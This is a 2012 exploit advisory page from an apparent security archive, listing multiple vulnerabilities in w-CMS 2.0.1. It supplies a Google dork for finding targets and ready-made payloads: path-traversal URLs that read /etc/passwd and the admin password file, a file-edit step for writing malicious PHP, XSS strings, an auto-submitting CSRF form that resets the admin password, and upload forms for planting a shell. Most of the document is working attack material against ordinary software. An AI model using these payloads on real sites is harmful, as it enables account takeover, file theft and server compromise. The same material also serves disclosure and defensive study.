exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

w-CMS 2.0.1 CSRF / XSS / File Disclosure / Shell Upload

w-CMS 2.0.1 CSRF / XSS / File Disclosure / Shell Upload
Posted Apr 7, 2012
Authored by Black-ID

w-CMS version 2.0.1 suffers from cross site request forgery, cross site scripting, file disclosure and shell upload vulnerabilities.

tags | exploit, shell, vulnerability, xss, info disclosure, csrf
SHA-256 | a54a57a19b0b91498aa3b82d36c50cd8b5837a2b5eb5797aff500f8693ef7abf
Download | Favorite | View

w-CMS 2.0.1 CSRF / XSS / File Disclosure / Shell Upload

Change Mirror Download
+----------------------------------------------------------------------+
|            ____  _            _           _____ _____                |
|           |  _ \| |          | |         |_   _|  __ \               |
|           | |_) | | __ _  ___| | __  _____ | | | |  | |              |
|           |  _ <| |/ _` |/ __| |/ / |_____|| | | |  | |              |
|           | |_) | | (_| | (__|   <        _| |_| |__| |              |
|           |____/|_|\__,_|\___|_|\_\      |_____|_____/               |
|                                                                      |
|/********************************************************************\|
|                                                                      |
|  [x] Exploit Title: w-CMS 2.0.1 Multiple Vulnerabilities             |
|  [x] Google Dork: intext:"Powered by w-CMS"                          |
|  [x] Version    : 2.0.1                                              |
|  [x] WebSite    : http://w-cms.org/                                  |
|  [x] Software Link: http://wcms.googlecode.com/files/wcms-2.01.zip   |
|  [x] Author: Black-ID                                                |
|  [x] Tested on: Win Xp/7 Linux Uubuntu 10.04                         |
|  [x] Platform: Php                                                   |
|  [x] Risk      : High                                                |
+----------------------------------------------------------------------+
 PoC/Exploit:
  
1.# Local File Disclosure [LFD]
 
~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd
# Admin Pass Disclosure
~ [PoC]Http://[victim]/path/index.php?p=../../password
 
+----------------------------------------------------------------------+
 
2.# Local File Edit/Write
~ [PoC]Http://[victim]/admin.php?edit=../../../dz0.php
 
Just Fill The Text Area With Evil Code (Php) & Click Save
 
+----------------------------------------------------------------------+
 
3.# Cross Site Scripting (XSS)
 
~ [PoC]Http://[victim]/path/?p=<script>alert('Dz0')</script>
~ [PoC]Http://[victim]/path/index.php?p=<script>alert('Dz0')</script>
 
+----------------------------------------------------------------------+
 
4.# Html Code Injection
~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)
You Can Inject Html Code In The text Area
Exapmle : <H3>Own3d</H3>
++ You Can Inject Xss Too
Exapmle : <script>alert('Dz0')</script>
 
+----------------------------------------------------------------------+
 
5.# Cross Site Request Forgny (CSRF) Admin Change Pass
 
 
~ [PoC] Inject This Evil Code In Contact Form
 
<html>
<head>
<title>Test</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
 
<SCRIPT LANGUAGE="JavaScript"><!--
setTimeout('document.test.submit()',0);
//--></SCRIPT>
 
</head>
 
<body>
<form name="test" id="form1" method="post" action="http://localhost/wcms-2.01/admin.php?settings=password"><!-- Target Site -->
  <p>
    <input name="password1" type="text" value="dz0" /><!-- New Password -->
    <input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
  </p>
  <p><input type="submit" name="Change" value="Change" />
   </p>
</form>
</body>
</html>
 
 
+----------------------------------------------------------------------+
 
6.# Arbitary File Upload
~ [PoC]Http://[victim]/admin.php
 
# Add Folder
<form action='Http://[victim]/path/admin.php' method='post'><input type='hidden' name='files' value='folders' /><h2>
    Update Folders</h2><div class='left'>
                  Folder Name</div>
                  <div class='right'>
                  <input name='newfolder' value='' /><br /><input style='width: auto;' class='button' type='submit' value='Add' /></form>
 
 
# Upload File
 
<form class='P10' action='Http://[victim]/admin.php' method='post' enctype='multipart/form-data'>
<input type='hidden' name='files' value='upload' />
<h2>Upload Files</h2>
<p><b>Folder:</b> <select name='folder'><option value='Dz'>Dz</option></p><p>
<div id='settings'>
<div class='left'>
<p>Files</p>
 
</div>
<div class='right'>
<input type='file' name='file[]' class='multi' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' /><div class='MultiFile-wrap' id='MultiFile5_wrap'><input style='position: absolute; top: -3000px;' name='' class='multi MultiFile-applied' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' type='file' /><div class='MultiFile-list' id='MultiFile5_wrap_list'></div><div class='MultiFile-label'>
<input style='width: auto;' class='button' type='submit' value='Upload' />
</div></div></form> 
 
 
+----------------------------------------------------------------------+
|       [x] Greetz   : Hidden Pain - Liyan Oz - Kedans Dz - Ddos-Dz    |
|                                                                      |
|       BaC.Dz - Killer-Dz - Cyb3r-DZ - Ev!LsCr!pT_Dz - Th3 Viper      |
|                                                                      |
|       BLaCk_SPECTRE - Kha&miX - Damane2011 - YaSmouh - ra3ch         |
|                                                                      |
|       [x] Special 10x: Sec4Ever.Com - xDZx Team - Is-Sec.Org         |
+----------------------------------------------------------------------+

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close